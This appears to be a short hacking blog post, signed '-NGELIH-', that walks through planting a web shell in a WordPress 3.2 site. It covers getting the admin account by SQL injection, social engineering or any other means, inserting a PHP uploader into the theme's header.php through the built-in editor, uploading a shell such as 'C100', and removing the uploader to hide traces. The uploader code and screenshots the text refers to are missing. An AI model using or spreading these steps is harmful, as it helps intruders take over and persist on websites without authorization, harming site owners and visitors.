In this brief article I will give a little tutorial for how we can embed a web shell at cms wordpress without using any plugins.
This I did on the localhost with the URL address and wordpress.localhost on WordPress version 3.2. For other versions, please try ...
Once we managed to get the wordpress admin account target, it's up to you how to get it, probably from SQL Injection, Social enginering, whatever is not the problem, which is important to go to the Dashboard from admin
Well, we start ..
Login to the admin dashboard panel of its via http://wordpress.localhost/wp-login.php
Enter your username and password from his wordpress, after a successful login, then we will be taken to the dashboard page admin panel, like the bland below
Once successful, then select Appreance --> Editor and select a file we will edit, for example, we select the file header.php, like the one in the picture below.
Then please us include uploader php script that allows you to upload a shell our website at the beginning of the script file header.php.this is example file:
Then click the Update file, and note the words "File edited successfully", and note the URL is created that is
That means the file was located in the path / wp-content/themes/twentyeleven/header.php
As in the show in the picture below
then the URL to access the last uploader was: http://wordpress.localhost/wp-content/themes/twentyeleven/header.php
It remains to be uploading a web shell, for example C100.
and to access his sojourn we navigate to the folder twentyeleven
and ... Here is the result:
Binggo, we get its web shell ..
DO NOT FORGET TO REMOVE THE FILE header.php Uploader
Happy Hacking ...
9:41 AM -NGELIH-